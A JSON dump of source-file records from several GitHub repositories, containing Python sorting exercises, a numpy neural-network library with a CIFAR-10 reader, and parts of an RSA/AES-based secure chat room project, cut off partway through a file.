[ { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 0.446153849363327, "avg_line_length": 12.928571701049805, "blob_id": "9a257199fefb5a6da4d8d6963f3c7409ead48c6e", "content_id": "1b023e28af47522acc51990626aa9947136917ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 195, "license_type": "no_license", "max_line_length": 31, "num_lines": 14, "path": "/review/min_max.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "def min_max(a, b):\n if a < b:\n a, b = b, a\n if a > b:\n b, a = a, b\n return {\"min\": a, \"max\": b}\n\n\nprint(min_max(12, 12))\n\na = list(range(100))\n\nprint(min(a))\nprint(max(a))\n" }, { "alpha_fraction": 0.4416666626930237, "alphanum_fraction": 0.4833333194255829, "avg_line_length": 16.14285659790039, "blob_id": "af582c745d2c04afc7982c7069ded68ba5a5f999", "content_id": "7e1d0ba26fe124578378c9579f4744e484650904", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "no_license", "max_line_length": 43, "num_lines": 14, "path": "/review/bubble_sort.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "from random import randint\n\nN = 10\na = list()\n\nfor i in range(N):\n a.append(randint(1, 99))\nprint(a)\n\nfor i in range(N - 1):\n for j in range(N - i - 1):\n if a[j] > a[j + 1]:\n a[j], a[j + 1] = a[j + 1], a[j]\nprint(a)\n" }, { "alpha_fraction": 0.4084506928920746, "alphanum_fraction": 0.4647887349128723, "avg_line_length": 9.142857551574707, "blob_id": "3eaebcd50e14e3aba6727711b1d651bc692495a0", "content_id": "96da930e6f661d4548cb9c4ba94571328d69e231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 18, "num_lines": 7, "path": "/review/summ_int.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "a = 10\nn = 9\nq = 2\nprint(a)\nfor i in range(n):\n a *= q\n print(a)\n" }, { "alpha_fraction": 0.4318618178367615, "alphanum_fraction": 0.4568138122558594, "avg_line_length": 20.70833396911621, "blob_id": "7716511a952cf521626b9e4a030101418f02f11d", "content_id": "63001f3e6d1c7aa30c1b4e7bdeab6003318dbe8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/review/quick_sort.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "import random\n\nnumbers = [4, 1, 2, 3, 6, 12, 10, 9, 8, 7]\n\n\ndef quick_sort(numbers):\n if len(numbers) <= 1:\n return numbers\n else:\n q = random.choice(numbers)\n s_nums = []\n m_nums = []\n e_nums = []\n for i in numbers:\n if i < q:\n s_nums.append(i)\n elif i > q:\n m_nums.append(i)\n else:\n e_nums.append(i)\n return quick_sort(s_nums) + e_nums + quick_sort(m_nums)\n\n\nprint(quick_sort(numbers))\n" }, { "alpha_fraction": 0.5034482479095459, "alphanum_fraction": 0.5310344696044922, "avg_line_length": 25.363636016845703, "blob_id": "34752906e700ea0f2ed9848aacadace50b2f0136", "content_id": "db412e2299cc4bc28b3acc8f391f10d1db32c1d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 43, "num_lines": 11, "path": "/review/max_min_from_list.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "def max_min_from_list(l):\n minimum = float('inf')\n maximum = float('-inf')\n for item in l:\n if item < minimum:\n minimum = item\n if item > maximum:\n maximum = item\n return {\"min\": minimum, \"max\": maximum}\n\nmax_min_from_list([1,2,3,4,5,6,7,8])\n" } ]
5
kuanb/traffic_img_processor
https://github.com/kuanb/traffic_img_processor
a9c277857a7c7a16ebe1df403167011ccfc2589f
1c3daa95aeee796d58d293c0a87600545abb6c00
04fb3e5abe5dcf48507d9a3c56788f51f9f461ee
refs/heads/master
2016-09-06T18:04:39.351455
2015-09-02T21:52:28
2015-09-02T21:52:28
41,827,065
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5644567012786865, "alphanum_fraction": 0.581031322479248, "avg_line_length": 29.13888931274414, "blob_id": "bc1bc8270ea28b22982b7294bf0c757a3f490837", "content_id": "f63a8549653e38fe33a9a1182114b68368586473", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1086, "license_type": "no_license", "max_line_length": 90, "num_lines": 36, "path": "/median.py", "repo_name": "kuanb/traffic_img_processor", "src_encoding": "UTF-8", "text": "import cv2\nimport os\nimport numpy\nimport math\n\nallPhotos = []\n\npath = 'imgs/'\nfor fn in os.listdir(path):\n current = path + fn\n if os.path.isfile(current):\n img = cv2.imread(current)\n allPhotos.append(img)\n\n# check that all images are the same size\nif all(x.shape == allPhotos[0].shape for x in allPhotos):\n col = range(allPhotos[0].shape[0]-1)\n row = range(allPhotos[0].shape[1]-1)\n for c in col:\n for r in row:\n eachImageVals = {\"r\": [], \"b\": [], \"g\":[]}\n for img in allPhotos:\n vals = img[c,r]\n eachImageVals[\"r\"].append(vals[0])\n eachImageVals[\"b\"].append(vals[1])\n eachImageVals[\"g\"].append(vals[2])\n for v in eachImageVals:\n eachImageVals[v] = numpy.median(numpy.array(eachImageVals[v]))\n eachImageVals[v] = math.trunc(eachImageVals[v])\n allPhotos[0][c,r] = [eachImageVals[\"r\"],eachImageVals[\"g\"],eachImageVals[\"b\"]]\n\nprint 'finished'\n\ncv2.imshow('image', allPhotos[0])\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n" } ]
1
vinupriyesh/deeplearning-numpy
https://github.com/vinupriyesh/deeplearning-numpy
1c6064e8403e1dfd24c3180755b67c3bfe7b1d44
57b16a359f097f1abab9cc1fe12a293220092cb4
e56d33951d710b2c10e29293b3d0b54da7439010
refs/heads/master
2021-09-05T19:15:29.044974
2018-01-30T13:29:36
2018-01-30T13:29:36
113,292,288
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6316297054290771, "alphanum_fraction": 0.6586306691169739, "avg_line_length": 25.615385055541992, "blob_id": "bbcf7e35f24d3cf00309497cb7191bfd4ccdf1ab", "content_id": "5f0a4aed2ee61b54a75bcd5b92ce4b23c3fdc641", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1037, "license_type": "permissive", "max_line_length": 50, "num_lines": 39, "path": "/cifar10_reader.py", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef unpickle(file):\n\timport pickle\n\twith open(file, 'rb') as fo:\n\t\tdict = pickle.load(fo, encoding='bytes')\n\treturn dict\n\ndef get_all_data():\n\tx,y,names = get_data('data_batch_1')\n\tfor i in range(2,6):\n\t\tx_t,y_t,names_t = get_data('data_batch_'+str(i))\n\t\tx = np.concatenate((x,x_t),axis = 1)\n\t\ty = np.concatenate((y,y_t),axis = 1)\n\t\tnames = np.concatenate((names,names_t),axis = 0)\n\treturn x,y,names\n\ndef get_data(file):\n\tabsFile = os.path.abspath(\"data/\"+file)\n\tdict = unpickle(absFile)\n\tX = np.asarray(dict[b'data'].T).astype(\"uint8\")\n\tYraw = np.asarray(dict[b'labels'])\n\tY = np.zeros((10,10000))\n\tfor i in range(10000):\n\t\tY[Yraw[i],i] = 1\n\tnames = np.asarray(dict[b'filenames'])\n\treturn X,Y,names\n\ndef visualize_image(X,Y,names,id):\n\trgb = X[:,id]\n\timg = rgb.reshape(3,32,32).transpose([1, 2, 0])\n\tplt.imshow(img)\n\tplt.title(names[id])\n\tdir = os.path.abspath(\"output/samples\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tplt.savefig(dir+\"/\"+names[id].decode('ascii'))" }, { "alpha_fraction": 0.6744421720504761, "alphanum_fraction": 0.6866125464439392, "avg_line_length": 35.51852035522461, "blob_id": "67f81f0f8bbcd936d21ce9f7e1926d7b5f291bd1", "content_id": "252f56cdb60b0f38f46739984e95851d44253223", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 986, "license_type": "permissive", "max_line_length": 124, "num_lines": 27, "path": "/README.md", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "# deeplearning-numpy\nSimple deeplearning library using numpy only.\n\n## Usage\n\ncall `nn.model` with x and x with keyword parameters\n\n### parameters\n- X : input to the model - (no. of features x no. of samples)\n- Y : output of the model - (no. of classes x no. of samples)\n\n### Keyword parameters\n- **alpha** : Learning Rate \n *default* : 0.01\n- **iter** : Iterations \n*default* : 3000\n- **hidden_layer_dims** : Hidden layer dimentions, also decides the number of hidden layers based on the length of this list\n*default* : [] \n- **activation** : Activation function for the other layers and the last layer as a list of length 2. \n*supports* : sigmoid, tanh, relu, leaky_relu, softmax \n*default* : ['tanh','sigmoid']\n- **batch_size** : Mini batch size \n*default* : X.shape[1]\n- **dev_set_ratio** : Dev set to total data-set ratio. \n*default* : 0.02\n- **parameters_file** : File-name for the parameters file to import incase of using/training a pretrained model. \n*default* : None\n" }, { "alpha_fraction": 0.5669013857841492, "alphanum_fraction": 0.5933098793029785, "avg_line_length": 23.69565200805664, "blob_id": "5ee5a83729f94541aa247ad2aa067f1681efbc27", "content_id": "e87b29a88932068a4a7df6c5954861e1eaf27505", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 568, "license_type": "permissive", "max_line_length": 41, "num_lines": 23, "path": "/activations.py", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\ndef tanh(z):\n return np.tanh(z)\ndef relu(z):\n return z * (z > 0)\ndef softmax(z):\n e = np.exp(z - np.max(z,axis=0))\n return e/e.sum(axis=0)\ndef leaky_relu(z, epsilon=0.1):\n return np.maximum(epsilon * z, z)\ndef inverse_tanh(z,a):\n return (1-np.power(a,2))\ndef inverse_relu(z,a):\n dz = np.array(z,copy = True)\n dz[z <= 0] = 0\n return dz\ndef inverse_leaky_relu(z,a, epsilon=0.1):\n gradients = 1. * (z > epsilon)\n gradients[gradients == 0] = epsilon\n return gradients\n" }, { "alpha_fraction": 0.6483199000358582, "alphanum_fraction": 0.6661091446876526, "avg_line_length": 30.023584365844727, "blob_id": "2c4bd9bb1c0d3a8ad826e649bbbf329468c994e7", "content_id": "fcdf820aef69e24e61ea3277f30026f5372b69c0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6577, "license_type": "permissive", "max_line_length": 133, "num_lines": 212, "path": "/nn.py", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "import numpy as np\nimport activations as af\nimport datetime\nimport sys\nimport matplotlib.pyplot as plt\nimport os\n\n\ndef log(str):\n\ttm = datetime.datetime.now().strftime(\"%I:%M:%S %p\")\n\tprint(\"{} -> {}\".format(tm,str))\n\ndef init_parameters(layer_dims,parameters_file):\n\tif parameters_file == None:\n\t\treturn init_parameters_new(layer_dims)\n\tlog(\"Reusing the parameter from {}\".format(parameters_file))\n\tparameters = np.load(parameters_file)\n\tlog(type(parameters))\n\tlog(parameters[()]['W1'].shape)\n\treturn parameters[()]\ndef init_parameters_new(layer_dims):\n\tparameters = {}\n\tL = len(layer_dims)\n\tfor l in range(1, L):\n\t\tparameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) / np.sqrt(layer_dims[l-1])\n\t\tparameters['b' + str(l)] = np.zeros((layer_dims[l], 1))\n\treturn parameters\n\ndef perform_activation(activation,Z):\n\treturn getattr(sys.modules[\"activations\"],activation)(Z)\n'''\n\tif activation == 'tanh':\n\t\treturn af.tanh(Z)\n\telif activation == 'sigmoid':\n\t\treturn af.sigmoid(Z)\n\telif activation == 'relu':\n\t\treturn af.relu(Z)\n'''\ndef perform_activation_backwards(activation,Z,A):\n\treturn getattr(sys.modules[\"activations\"],\"inverse_\"+activation)(Z,A)\n'''\n\ts = perform_activation(activation,z)\n\tdZ = dA * s * (1-s)\n\treturn dZ\n'''\n\ndef update_grads(grads,parameters,alpha):\n\tL = len(parameters) // 2\n\tfor l in range(1,L+1):\n\t\tparameters['W' + str(l)] = parameters['W' + str(l)] - alpha * grads['dW' + str(l)]\n\t\tparameters['b' + str(l)] = parameters['b' + str(l)] - alpha * grads['db' + str(l)]\n\treturn parameters #have to check whether this is really reqd\n\ndef back_prop(m,A_values,Z_values,Y,activation,parameters):\n\tgrads = {}\n\tdZ = A_values[-1] - Y\n\tL = len(A_values)-1\n\tfor l in reversed(range(L)):\n\t\tgrads['dW' + str(l + 1)] = (1 / m) * np.dot(dZ,A_values[l].T)\n\t\tgrads['db' + str(l + 1)] = (1 / m) * np.sum(dZ,axis=1,keepdims=True)\n\t\tif l != 0:\n\t\t\tdZ = np.dot(parameters['W' + str(l+1)].T,dZ)\n\t\t\tdZ *= perform_activation_backwards(activation[0],Z_values[l-1],A_values[l])\n\treturn grads\n\ndef forward_prop(X,activation,parameters):\n\tA_values = []\n\tZ_values = []\n\tL = len(parameters) // 2\n\tA = X\n\tA_values.append(A)\n\tfor l in range(1,L):\n\t\tZ = np.dot(parameters['W' + str(l)],A) + parameters['b' + str(l)]\n\t\tA = perform_activation(activation[0],Z)\n\t\tA_values.append(A)\n\t\tZ_values.append(Z)\n\tZ = np.dot(parameters['W' + str(L)],A) + parameters['b' + str(L)]\n\tA = perform_activation(activation[1],Z)\n\tA_values.append(A)\n\tZ_values.append(Z)\n\treturn A_values,Z_values\n\ndef validate (Y,Y1,m):\n\tsucc = 0\n\tfor i in range(m):\n\t\tif(np.sum(Y[:,i] == Y1[:,i]) == 10):\n\t\t\tsucc+=1\n\treturn succ/m\n\ndef predict(m,A2):\n\tY = np.zeros((10, m))\n\tfor i in range(m):\n\t\tmax_val = 0\n\t\tmax_val_id = 0\n\t\tfor j in range(10):\n\t\t\tif A2[j,i] > max_val :\n\t\t\t\tmax_val_id = j\n\t\t\t\tmax_val = A2[j,i]\n\t\tY[max_val_id,i] = 1\n\treturn Y\n\ndef get_batch(X,Y,m,X_current_batch,Y_current_batch,batch_size,batch_cursor,epoch):\n\tX_current_batch[:,0:batch_size] = X[:,batch_cursor:batch_cursor+batch_size]\n\tY_current_batch[:,0:batch_size] = Y[:,batch_cursor:batch_cursor+batch_size]\n\tif batch_cursor + 2*batch_size >= m:\n\t\tbatch_cursor = 0\n\t\tepoch+=1\n\telse:\n\t\tbatch_cursor += batch_size\n\treturn X_current_batch,Y_current_batch,batch_cursor,epoch\n\ndef compute_cost(y_hat,Y,m,train_cost,train_accu):\n\tlogprobs = np.multiply(np.log(y_hat), Y) + np.multiply((1 - Y), np.log(1 - y_hat))\n\tcost = - np.sum(logprobs) / m\n\ttrain_cost.append(cost)\n\tY2 = predict(m,y_hat)\n\taccu = validate(Y,Y2,m)\n\ttrain_accu.append(accu)\n\treturn cost\n\ndef compute_dev_set(X,Y,m,activation,parameters,dev_accu):\n\tA_values,Z_values = forward_prop(X,activation,parameters)\n\tY2 = predict(m,A_values[-1])\n\taccu = validate(Y,Y2,m)\n\tdev_accu.append(accu)\n\treturn accu\n\ndef model(X,Y,**kwargs):\n\tlog(\"Entered model with {}\".format(kwargs))\n\tlog(\"X size : {}, Y size : {}\".format(X.shape,Y.shape))\n\t\n\tx_n,m = X.shape\n\ty_n = len(Y)\n\t\n\talpha = kwargs.get('alpha',0.01)\n\titer = kwargs.get('iter',3000)\n\tlayer_dims = kwargs.get('hidden_layer_dims',[])\n\tactivation = kwargs.get('activation',['tanh','sigmoid'])\n\tbatch_size = kwargs.get('batch_size',m)\n\tdev_set_ratio = kwargs.get('dev_set_ratio',0.02)\n\tparameters_file = kwargs.get('parameters_file',None)\n\t\n\tlayer_dims.insert(0,x_n)\n\tlayer_dims.insert(len(layer_dims),y_n)\n\n\tparameters = init_parameters(layer_dims,parameters_file)\n\tlog(len(parameters))\n\titerations_capture_freq = 50\n\tcapture_frequency = 500\n\taccu = 0\n\ttrain_cost = []\n\ttrain_accu = []\n\tdev_accu = []\n\tbatch_cursor = 0\n\tepoch = 0\n\tX_current_batch = np.zeros([x_n,batch_size])\n\tY_current_batch = np.zeros([y_n,batch_size])\n\tm_dev = int(m*dev_set_ratio)\n\tm = m - m_dev\n\tX,X_dev = np.split(X,[m],axis=1)\n\tY,Y_dev = np.split(Y,[m],axis=1)\n\tlog(\"Post splitting of train and dev set, shape of train : {} , dev : {}\".format(X.shape,X_dev.shape))\n\tprint(\"Training the model, please wait\")\n\tprint(\"00.00% cost: 00.0000 accu: 0.0000\",end=\"\")\n\tfor i in range(iter):\n\t\tX_current_batch,Y_current_batch,batch_cursor,epoch = get_batch(X,Y,m,X_current_batch,Y_current_batch,batch_size,batch_cursor,epoch)\n\t\tA_values,Z_values = forward_prop(X_current_batch,activation,parameters)\n\t\tif(i%iterations_capture_freq==0):\n\t\t\tcost = compute_cost(A_values[-1],Y_current_batch,batch_size,train_cost,train_accu)\n\t\t\tif m_dev >0:\n\t\t\t\taccu = compute_dev_set(X_dev,Y_dev,m_dev,activation,parameters,dev_accu)\n\t\t\tprint(\"\\b\"*35,end=\"\")\n\t\t\tprint(\"{:05.2f}% cost: {:07.4f} accu: {:06.4f}\".format((i/iter*100),cost,accu),end=\"\",flush=True)\n\t\t\t\t#log('dev acc : {}'.format(accu))\n\t\tgrads = back_prop(batch_size,A_values,Z_values,Y_current_batch,activation,parameters)\n\t\tparameters = update_grads(grads,parameters,alpha)\n\t\tif i%capture_frequency == 0 and i!=0:\n\t\t\tsnapshot(train_cost,train_accu,dev_accu,parameters,i)\n\tprint(\"\")\n\tif m_dev >0:\n\t\taccu = compute_dev_set(X_dev,Y_dev,m_dev,activation,parameters,dev_accu)\n\tsnapshot(train_cost,train_accu,dev_accu,parameters,i)\n\tlog(\"Model ready with accuracy : {}\".format(accu))\n\treturn parameters\n\ndef snapshot(train_cost,train_accu,dev_accu,parameters,i):\n\tplt.clf()\n\tdir = os.path.abspath(\"output/snapshots\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tnp.save(os.path.join(dir, 'parameters'+str(i)),parameters)\n\t#cost graph\n\tplt.subplot(3,1,1)\n\tplt.grid(True)\n\tay = plt.gca()\n\tay.set_yscale('log')\n\tplt.plot(train_cost)\n\tplt.title(\"Cost graph\")\n\t\n\t#train accu\n\tplt.subplot(3,1,2)\n\tplt.grid(True)\n\tplt.plot(train_accu)\n\tplt.title(\"Training accuracy\")\n\t\n\t#dev accu\n\tplt.subplot(3,1,3)\n\tplt.grid(True)\n\tplt.plot(dev_accu)\n\tplt.title(\"Dev set accuracy\")\n\tplt.savefig(dir+\"/graph\"+str(i)+\".png\")\n\tplt.close()\n" } ]
4
enathang/SecureChatRoom
https://github.com/enathang/SecureChatRoom
e368d8bafc889370dcda0a4759f4cb431f1929d2
77c4bd16e94d7c6dbdfb0fc33d338a45cc62487d
42ae905da027fe9428830d5accb05c3a2eb07511
refs/heads/master
2020-04-09T05:04:25.534886
2019-06-29T22:37:12
2019-06-29T22:37:12
160,050,153
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6136363744735718, "alphanum_fraction": 0.6227272748947144, "avg_line_length": 39, "blob_id": "d3529fc44ba65d9e71d13e27d229efe7afaba4f5", "content_id": "b51e8efe3a8ff7e98c8a56ef6fbbb3c1a1fe97a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 440, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/gen_keyfiles.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Cryptodome.PublicKey import RSA\n\nfor usr in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n key = RSA.generate(2048)\n keystr_priv = key.exportKey()\n with open(\"./keys/\" + usr + \"_priv.pem\", \"w\") as prv_file:\n print(\"{}\".format(keystr_priv.decode()), file=prv_file)\n\n keystr_pub = key.publickey().exportKey()\n with open(\"./keys/\" + usr + \"_pub.pem\", \"w\") as pub_file:\n print(\"{}\".format(keystr_pub.decode()), file=pub_file)\n" }, { "alpha_fraction": 0.6779900789260864, "alphanum_fraction": 0.6808209419250488, "avg_line_length": 27.280000686645508, "blob_id": "07f450057f9c01d32fe4498857b58175cee7f73b", "content_id": "b55ef1590d5549a241bd95a580b66ee051d62213", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1413, "license_type": "no_license", "max_line_length": 95, "num_lines": 50, "path": "/client_gui.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Tkinter import *\nimport interface_functions\n\nimport user \n\nclass client_gui:\n\tclass chat_gui(netif):\n\t\tdef receive(netif):\n\t\t\t\"\"\"Handles receiving of messages.\"\"\"\n\t\t\twhile True:\n\t\t\t\tstatus, enc_msg = netif.receive_msg(blocking=True)\n\n\t\tdef send(event=None): # event is passed by binders.\n\t\t\t\"\"\"Handles sending of messages.\"\"\"\n\t\t\tmsg = my_msg.get()\n\t\t\tmy_msg.set(\"\") # Clears input field.\n\t\t\t## build enc message to send then call send functions\n\n\t\t\tif msg == \"{quit}\":\n \t\t\n \t\ttop.quit()\n\n\n\t\tdef on_closing(event=None):\n\t\t\t\"\"\"This function is to be called when the window is closed.\"\"\"\n \t\tmy_msg.set(\"{quit}\")\n\t\t\tsend()\n\n\t\ttop = tkinter.Tk()\n\t\ttop.title(\"CsippCsapp\")\n\n\t\tmessages_frame = tkinter.Frame(top)\n\t\tmy_msg = tkinter.StringVar() # For the messages to be sent.\n\t\tmy_msg.set(\"Type your messages here.\")\n\t\tscrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.\n\n\t\tmsg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)\n\t\tscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\n\t\tmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\n\t\tmsg_list.pack()\n\n\t\tmessages_frame.pack()\n\n\t\tentry_field = tkinter.Entry(top, textvariable=my_msg)\n\t\tentry_field.bind(\"<Return>\", send)\n\t\tentry_field.pack()\n\t\tsend_button = tkinter.Button(top, text=\"Send\", command=send)\n\t\tsend_button.pack()\n\n\t\ttop.protocol(\"WM_DELETE_WINDOW\", on_closing)" }, { "alpha_fraction": 0.59117192029953, "alphanum_fraction": 0.5965307950973511, "avg_line_length": 38.39444351196289, "blob_id": "a4a96e58f778305199ee6c8be0658dc7d1af547f", "content_id": "abcd4576124a76ae12c160c98e1cf2b3e2168784", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7091, "license_type": "no_license", "max_line_length": 113, "num_lines": 180, "path": "/server_func.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Crypto.Random import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Hash import SHA256\nfrom enum import Enum\nimport sys\nimport user\n\nfrom netinterface import network_interface\nfrom chat_protocol import MsgType\nfrom chat_protocol import MSG_SIGNATURE_SIZE\nimport chat_protocol\nimport random\n\nSERVER_ADDR = b'S'\nDIRTY_MSG_FILE = './dirty_msgs'\nclass Server:\n class ServerState(Enum):\n UNINITIALIZED = 0\n INITIALIZED = 1\n def __init__(self, netif, group_members_fname, keyfile):\n # Read in all group members, and set them to be offline\n self.group_members = {}\n with open(group_members_fname, 'r') as f:\n for line in f:\n self.group_members[line.strip()] = False\n with open(keyfile, 'r') as kfile:\n keystr = kfile.read()\n self.key_pair = RSA.import_key(keystr)\n self.dig_signer = PKCS1_PSS.new(self.key_pair)\n #self.state = self.ServerState.UNINITIALIZED\n self.netif = netif\n self.last_secret_hash = None\n def listen(self):\n while True:\n print('Waiting for msg...')\n status, msg = self.netif.receive_msg(blocking=True)\n self.evaluate_msg(msg)\n\n def evaluate_msg(self, msg):\n print('Evaluating msg...', msg)\n try:\n msg_type = int(msg[:chat_protocol.MSG_TYPE_SIZE])\n print('Message type: ', msg_type)\n except ValueError:\n print('Invalid msg_type received. Dropping message.', file=sys.stderr)\n return\n if not self.validate(msg):\n print('Message did not validate correctly.', file=sys.stderr)\n return\n\n msg_source = msg[1:2].encode('ascii')[0] if type(msg) != bytes else msg[1:2]\n try:\n opts = {\n MsgType.JOIN : self.response_join,\n MsgType.LEAVE : self.response_leave,\n MsgType.MSG : self.response_msg,\n MsgType.SECRET : self.response_secret,\n MsgType.CHALLENGE : self.response_challenge\n }[msg_type](msg, msg_source)\n except KeyError:\n print('Invalid msg_type received. Dropping message.', file=sys.stderr)\n return\n\n def destroy(self):\n print('Server resetting...')\n for usr in self.group_members:\n self.group_members[usr] = False\n #self.state = ServerState.UNINITIALIZED\n\n def validate(self, msg):\n print('Validating msg...\\n', msg[:-MSG_SIGNATURE_SIZE])\n try:\n usr = msg[1:2].decode('ascii')\n with open('./keys/' + usr +'_pub.pem', 'r') as usr_kfile:\n usr_kstr = usr_kfile.read()\n usr_key = RSA.import_key(usr_kstr)\n\n usr_sig = msg[-MSG_SIGNATURE_SIZE:]\n verify_signature(msg[:-MSG_SIGNATURE_SIZE], usr_sig, usr_key)\n return True\n except SyntaxError:\n return False\n\n def response_join(self, msg, msg_source):\n print('Responding to join message...')\n self.group_members[msg_source.decode()] = True\n self.send_init(msg_source)\n\n def response_leave(self, msg, msg_source):\n print('Responding to leave message...')\n # We already have verified that the user exists (so no need to check for KeyError)\n try:\n self.group_members[msg_source] = False\n if(len([x for x in self.group_members if self.group_members[x]]) != 0):\n self.destroy()\n new_initiator = random.choice(list(self.group_members))\n self.send_init(new_initiator)\n except KeyError:\n print('key error in leave response -- specified group member not found!', file=sys.stderr)\n return\n\n def response_msg(self, msg, msg_source):\n print('Responding to text message...')\n self.forward_msg(msg, msg_source)\n\n def response_secret(self, msg, msg_source):\n print('Responding to secret message...')\n self.last_secret_hash = SHA256.new(msg).digest()\n with open(DIRTY_MSG_FILE, 'r') as used_file:\n msg_content = used_file.read()\n if(msg_content.find(str(self.last_secret_hash)) != -1):\n return\n with open(DIRTY_MSG_FILE, 'a') as used_file:\n used_file.write(str(self.last_secret_hash))\n print(self.last_secret_hash)\n self.forward_msg(msg, msg_source)\n\n def response_challenge(self, msg, msg_source):\n print('Responding to challenge message...', msg)\n print(msg[2:-MSG_SIGNATURE_SIZE])\n msg_type = str(int(MsgType.CHALLENGE)).encode('ascii')\n cipher_rsa = PKCS1_OAEP.new(user.get_private_key(SERVER_ADDR.decode()))\n unencrypted_data = cipher_rsa.decrypt(msg[2:-MSG_SIGNATURE_SIZE])\n unencrypted_nonce = unencrypted_data[:16]\n msg_hash_to_verify = unencrypted_data[16:]\n if msg_hash_to_verify != self.last_secret_hash:\n print('Somebody\\'s prolly trying to force an old key!')\n self.send_msg(msg, msg_source) # Send junk message that will fail\n\n cipher_rsa_usr = PKCS1_OAEP.new(user.getPublicKey(msg_source.decode()))\n reencrypted_data = cipher_rsa_usr.encrypt(unencrypted_nonce)\n msg = msg_type + SERVER_ADDR + reencrypted_data\n hash = SHA256.new(msg)\n sig = self.dig_signer.sign(hash)\n msg += sig\n self.send_msg(msg, msg_source)\n\n def forward_msg(self, msg, msg_source):\n print('Forwarding message from ', msg_source)\n try:\n dest_addresses = ''.join(\n [dest for dest in self.group_members if self.group_members[dest] and dest != msg_source.decode()]\n )\n self.send_msg(msg, dest_addresses)\n except:\n print('Client not found, message not forwarded? Client: ', self.group_members)\n\n\n def send_msg(self, msg, data_addresses):\n print('Sending message to ', data_addresses, '. Message: ', msg)\n # Below commented line if we want server wrapping messages with its own addr/sig combo\n #msg = self.format_msg(msg)\n\n data_addresses = data_addresses.decode() if type(data_addresses) == bytes else data_addresses\n self.netif.send_msg(data_addresses, msg)\n\n def format_msg(self, msg):\n msg = msg + SERVER_ADDR\n hash = SHA256.new(msg)\n signature = self.dig_signer.sign(hash)\n msg = msg + signature\n return msg\n\n def send_init(self, usr):\n# msg_type = bytes([MsgType.INIT])\n print('Received msg from', usr, 'Sending init...\\n')\n msg_type = str(int(MsgType.INIT)).encode('ascii')\n msg = self.format_msg(msg_type)\n self.send_msg(msg, usr)\n\ndef verify_signature(message, signature, key):\n h = SHA256.new(message)\n print(message, key)\n try:\n PKCS1_PSS.new(key).verify(h, signature)\n return True\n except SyntaxError:\n return False\n" }, { "alpha_fraction": 0.6980180740356445, "alphanum_fraction": 0.7074000239372253, "avg_line_length": 30.120437622070312, "blob_id": "743e0dc1c0ee1ad97c138d2317058c0178c3a340", "content_id": "0f150b28754eedb3f018539a428e35bf3d3433de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8527, "license_type": "no_license", "max_line_length": 111, "num_lines": 274, "path": "/user.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Crypto.Random import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Hash import SHA256\nfrom chat_protocol import MsgType\nfrom pathlib import Path\nfrom netinterface import network_interface\n\nimport os\nimport json\nimport sys\nfrom base64 import b64decode, b64encode\n\nshared_secret = -1\nUSER_MODE = \"RSA\"\ncounter = 0\nglobal address\naddress = \"A\";\nglobal session_key\nsession_key = b''\n\nglobal 